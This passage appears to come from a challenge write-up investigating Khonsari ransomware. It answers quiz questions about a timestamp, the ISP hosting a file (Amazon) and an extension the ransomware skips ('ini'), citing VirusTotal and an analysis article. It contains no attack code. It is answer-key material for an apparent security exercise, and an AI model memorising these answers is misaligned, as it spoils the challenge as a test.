<figure><img src="https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2Fh6Ilu8JcASM0LAth6svl%2Fimage.png?alt=media&#x26;token=d348d3de-6e0b-4ce4-98da-8257d1d45509" alt=""><figcaption></figcaption></figure>

**Answer: 2021-12-11 22:57:01**

## Q24 What is the ISP that owns the IP that serves the text file?

From the previous VirusTotal report, the owner of the IP is Amazon.

![](https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2FJ9lk1bhNg1q1GEicoQ1A%2Fimage.png?alt=media\&token=34b1941b-c70a-48cd-8bd2-cfc0d68039ad)

**Answer: Amazon**

## Q25 The ransomware checks for extensions to exclude them from the encryption process. What is the second extension the ransomware checks for?

From the Khonsari ransomware analysis article, we can see its behavior:

<figure><img src="https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2FaLDmHxVzXGynratxZuap%2Fimage.png?alt=media&#x26;token=0f169a9f-15df-426e-8022-b953a5442a41" alt=""><figcaption></figcaption></figure>

**Answer: ini**

<mark style="color:red;">Hope that helps you, and thank you :)</mark>


